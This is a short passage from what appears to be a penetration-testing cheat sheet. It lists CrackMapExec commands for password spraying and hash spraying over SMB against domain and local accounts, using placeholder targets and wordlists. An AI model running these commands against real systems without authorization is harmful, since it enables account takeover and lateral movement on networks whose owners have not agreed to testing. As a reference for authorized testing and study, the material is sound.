# 4. Spraying

### 4.1. Password Spray

CrackMapExec

```powershell
#Spray As Domain user
crackmapexec smb <IP> -d <domain> -u users.txt -p passwords.txt

#Spray As Local user
crackmapexec smb <IP> -u users.txt -p passwords.txt --local-auth
```

### 4.2. Hash Spray

CrackMapExec

```powershell
#Spray As Domain user
crackmapexec smb <IP> -d <domain> -u users.txt -H hashes.txt

#Spray As Local user
crackmapexec smb <IP> -u users.txt -H hashes.txt --local-auth
```